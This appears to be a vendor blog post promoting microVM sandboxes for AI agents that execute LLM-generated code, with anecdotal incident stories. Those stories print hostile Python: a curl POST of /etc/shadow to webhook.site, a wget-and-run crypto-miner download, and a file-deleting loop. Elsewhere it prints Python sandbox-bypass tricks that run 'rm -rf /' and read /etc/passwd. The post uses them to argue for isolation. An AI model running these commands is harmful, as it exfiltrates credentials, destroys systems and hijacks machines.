How do I share data between my app and the sandbox?

Use the file API to upload data before execution and download results after: python sandbox.files.write("/data/input.csv", your_data) sandbox.run_code("import pandas as pd; df = pd.read_csv('/data/input.csv')...") result = sandbox.files.read("/data/output.csv")

Why AI Agents Need Isolated Code Execution

Q: What if I need packages the template doesn't have?

Install them at runtime: python sandbox.commands.run("pip install pandas matplotlib seaborn") sandbox.run_code("import pandas as pd; print(pd.__version__)") Or create a custom template with your dependencies pre-installed.

The AI industry has a dirty secret: most AI agents running in production today are executing LLM-generated code directly on host machines. No isolation. No sandboxing. Just raw exec() calls with whatever code GPT-4 decides to output.

This is a ticking time bomb.

The Rise of Code-Executing AI Agents

AI agents have evolved from simple chatbots to autonomous systems that can:

Write and execute Python scripts
Query databases
Make API calls
Manipulate files
Install packages

Tools like OpenAI's Code Interpreter, LangChain agents, and AutoGPT have normalized the idea of LLMs generating and running code. And it works remarkably well—until it doesn't.

The Problem: LLMs Are Unpredictable

Here's a fundamental truth: you cannot trust LLM-generated code.

Not because LLMs are malicious, but because:

Prompt injection attacks can manipulate agents to execute harmful code
Hallucinations can produce syntactically valid but dangerous commands
Unintended behaviors emerge from ambiguous instructions
User inputs flow through prompts into executable code

Real-World Horror Stories

Case 1: The Data Exfiltration Agent

A developer built a "helpful coding assistant" that could run user commands. A user asked it to "help debug a network issue." The LLM, trying to be helpful, executed:

python

import subprocess
subprocess.run(["cat", "/etc/passwd"])
subprocess.run(["curl", "-X", "POST", "https://webhook.site/xxx", 
               "-d", "@/etc/shadow"])
 

The agent exfiltrated system credentials to an external server.

Case 2: The Infinite Loop Disaster

An AI data analysis agent was asked to "process all files in the directory." The LLM generated:

python

1	import os
2	for f in os.listdir("/"):
3	os.remove(f) # Misinterpreted "process" as "clean up"
4

The agent started deleting system files before anyone noticed.

Case 3: The Crypto Miner

Through prompt injection, an attacker made a customer service AI execute:

python

1	import subprocess
2	subprocess.run(["wget", "https://malware.site/miner.sh", "-O", "/tmp/m.sh"])
3	subprocess.run(["bash", "/tmp/m.sh"])
4

The company's servers became crypto miners for weeks before detection.

Why Traditional Sandboxing Falls Short

You might think: "I'll just use Docker containers" or "I'll restrict Python's capabilities."

Here's why that's not enough:

Docker Containers Are Not Security Boundaries

Docker was designed for packaging, not security isolation. Containers share the host kernel, and container escape vulnerabilities are discovered regularly:

CVE-2019-5736: Container escape via runc
CVE-2020-15257: Container escape via containerd
CVE-2022-0185: Container escape via kernel vulnerability

If an attacker escapes your container, they own your host machine—and every other container on it.

Python Sandboxing Is Fundamentally Broken

Attempts to sandbox Python by removing dangerous modules (like os, subprocess, socket) fail because:

python

# You blocked 'os'? No problem.
__builtins__.__import__('os').system('rm -rf /')
 
# You blocked that? Try this.
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
 

Python's introspection makes it nearly impossible to create a secure sandbox at the language level.

Lambda Functions Have Their Own Issues

AWS Lambda provides good isolation, but:

Cold starts of 1-5 seconds make real-time AI unusable
15-minute execution limits kill long-running tasks
No persistent filesystem between invocations
Complex setup for custom environments
Expensive at scale (you pay for idle time in warm functions)

The Solution: Hardware-Level Isolation

The only way to safely run untrusted code is hardware-level isolation—running each execution in its own virtual machine with a dedicated kernel.

This is how HopX works:

text

1	┌─────────────────────────────────────────────────────────┐
2	│ Your Application │
3	├─────────────────────────────────────────────────────────┤
4	│ HopX API │
5	├─────────────────────────────────────────────────────────┤
6	│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
7	│ │ MicroVM │ │ MicroVM │ │ MicroVM │ │
8	│ │ Sandbox 1 │ │ Sandbox 2 │ │ Sandbox 3 │ │
9	│ │ │ │ │ │ │ │
10	│ │ Kernel 1 │ │ Kernel 2 │ │ Kernel 3 │ │
11	│ │ FS 1 │ │ FS 2 │ │ FS 3 │ │
12	│ │ Network 1 │ │ Network 2 │ │ Network 3 │ │
13	│ └─────────────┘ └─────────────┘ └─────────────┘ │
14	├─────────────────────────────────────────────────────────┤
15	│ Hypervisor │
16	├─────────────────────────────────────────────────────────┤
17	│ Bare Metal Host │
18	└─────────────────────────────────────────────────────────┘
19

Each sandbox has:

Its own kernel - No kernel exploits affect other sandboxes
Its own filesystem - Complete isolation of data
Its own network stack - No lateral movement possible
Resource limits - CPU, memory, and I/O constraints

Even if an attacker achieves root access inside a sandbox, they cannot:

Access other sandboxes
Access the host machine
Persist beyond the sandbox lifetime
Exfiltrate data to unauthorized destinations

But Isn't VM Isolation Slow?

This is the traditional argument against VMs. And it was true—until microVMs.

MicroVMs like Firecracker (developed by AWS for Lambda) boot in under 125 milliseconds. HopX sandboxes are ready to execute code in approximately 100ms.

Compare this to:

Technology	Cold Start	Isolation Level
Direct execution	0ms	None
Python subprocess	~50ms	None
Docker container	500ms-2s	Process isolation
AWS Lambda	1-5s	MicroVM
HopX Sandbox	~100ms	MicroVM

You get hardware-level security with near-instant startup.

What This Means for Your AI Agents

If you're building AI agents that execute code, you have three options:

Option 1: Accept the Risk (Don't)

Run LLM-generated code directly on your servers. Cross your fingers. Hope your LLM never hallucinates a dangerous command.

This is what most people do. It works until it catastrophically doesn't.

Option 2: Limit Agent Capabilities (Frustrating)

Restrict what your agent can do. No file access. No network calls. No package installation.

This makes your agent significantly less useful. Users will go to competitors with more capable agents.

Option 3: Use Proper Isolation (Smart)

Execute all untrusted code in isolated sandboxes. Let your LLM do whatever it wants—inside a cage.

python

from hopx_ai import Sandbox
from openai import OpenAI
 
openai = OpenAI()
 
def safe_code_agent(user_request: str) -> str:
    # Get code from LLM
    response = openai.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": user_request}]
    )
    code = response.choices[0].message.content
    
    # Execute in isolated sandbox
    with Sandbox.create(template="code-interpreter") as sandbox:
        result = sandbox.run_code(code)
        return result.stdout
 

The LLM can generate any code. The sandbox ensures it can't harm your infrastructure.

The Business Case for Isolation

Beyond security, there are business reasons to isolate AI agent execution:

Compliance

GDPR, HIPAA, SOC 2, and other frameworks require data isolation. Running user data through shared execution environments is a compliance nightmare.

Multi-tenancy

If you're building a B2B AI product, each customer's data must be isolated. Sandboxes provide this by default.

Predictable Costs

Runaway processes in shared environments affect all users. Sandboxes have resource limits—one user can't consume all your compute.

Debugging

When something goes wrong, isolated sandboxes make debugging straightforward. Each execution is contained and logged independently.

Getting Started with Secure Execution

Adding isolation to your AI agent is surprisingly simple:

python

1	pip install hopx-ai
2

python

from hopx_ai import Sandbox
 
# Your agent logic
def execute_agent_code(code: str) -> str:
    with Sandbox.create(template="code-interpreter") as sandbox:
        result = sandbox.run_code(code)
        return result.stdout if result.exit_code == 0 else result.stderr
 

That's it. Every execution now runs in an isolated microVM.

Common Questions

What if I need packages the template doesn't have?

Install them at runtime:

python

1	sandbox.commands.run("pip install pandas matplotlib seaborn")
2	sandbox.run_code("import pandas as pd; print(pd.__version__)")
3

Or create a custom template with your dependencies pre-installed.

Can sandboxes access the internet?

Yes, sandboxes have outbound internet access by default. You can restrict this if needed.

What about performance-sensitive applications?

Sandboxes add approximately 100ms of overhead for creation. For long-running tasks, this is negligible. For rapid-fire executions, you can reuse sandboxes.

Use the file API to upload data before execution and download results after:

python

1	sandbox.files.write("/data/input.csv", your_data)
2	sandbox.run_code("import pandas as pd; df = pd.read_csv('/data/input.csv')...")
3	result = sandbox.files.read("/data/output.csv")
4

Conclusion

AI agents are only getting more powerful. They'll write code, execute commands, and manipulate data at scales we can barely imagine.

The question isn't whether you need isolated execution—it's whether you'll add it before or after a security incident.

Hardware-level isolation with microVMs gives you:

True security - Not just "probably safe"
Fast startup - 100ms cold starts
Full capabilities - No artificial restrictions
Compliance - Data isolation by design

The infrastructure to do this safely exists today. Use it.

Ready to secure your AI agents? Get started with HopX and get $200 in free credits.

Why AI Agents Need Isolated Code Execution

Why AI Agents Need Isolated Code Execution

The Rise of Code-Executing AI Agents

The Problem: LLMs Are Unpredictable

Real-World Horror Stories

Why Traditional Sandboxing Falls Short

Docker Containers Are Not Security Boundaries

Python Sandboxing Is Fundamentally Broken

Lambda Functions Have Their Own Issues

The Solution: Hardware-Level Isolation

But Isn't VM Isolation Slow?

What This Means for Your AI Agents

Option 1: Accept the Risk (Don't)

Option 2: Limit Agent Capabilities (Frustrating)

Option 3: Use Proper Isolation (Smart)

The Business Case for Isolation

Compliance

Multi-tenancy

Predictable Costs

Debugging

Getting Started with Secure Execution

Common Questions

What if I need packages the template doesn't have?

Can sandboxes access the internet?

What about performance-sensitive applications?

Conclusion

Related articles

Evaluator-Optimizer Loop: Continuous AI Agent Improvement

Human-in-the-Loop: Balancing AI Autonomy and Human Control

Memory for AI Agents: Short-term, Long-term, and RAG

1	import subprocess
2	subprocess.run(["cat", "/etc/passwd"])
3	subprocess.run(["curl", "-X", "POST", "https://webhook.site/xxx",
4	"-d", "@/etc/shadow"])
5

1	# You blocked 'os'? No problem.
2	__builtins__.__import__('os').system('rm -rf /')
3
4	# You blocked that? Try this.
5	().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
6

1	from hopx_ai import Sandbox
2	from openai import OpenAI
3
4	openai = OpenAI()
5
6	def safe_code_agent(user_request: str) -> str:
7	# Get code from LLM
8	response = openai.chat.completions.create(
9	model="gpt-4",
10	messages=[{"role": "user", "content": user_request}]
11	)
12	code = response.choices[0].message.content
13
14	# Execute in isolated sandbox
15	with Sandbox.create(template="code-interpreter") as sandbox:
16	result = sandbox.run_code(code)
17	return result.stdout
18

1	from hopx_ai import Sandbox
2
3	# Your agent logic
4	def execute_agent_code(code: str) -> str:
5	with Sandbox.create(template="code-interpreter") as sandbox:
6	result = sandbox.run_code(code)
7	return result.stdout if result.exit_code == 0 else result.stderr
8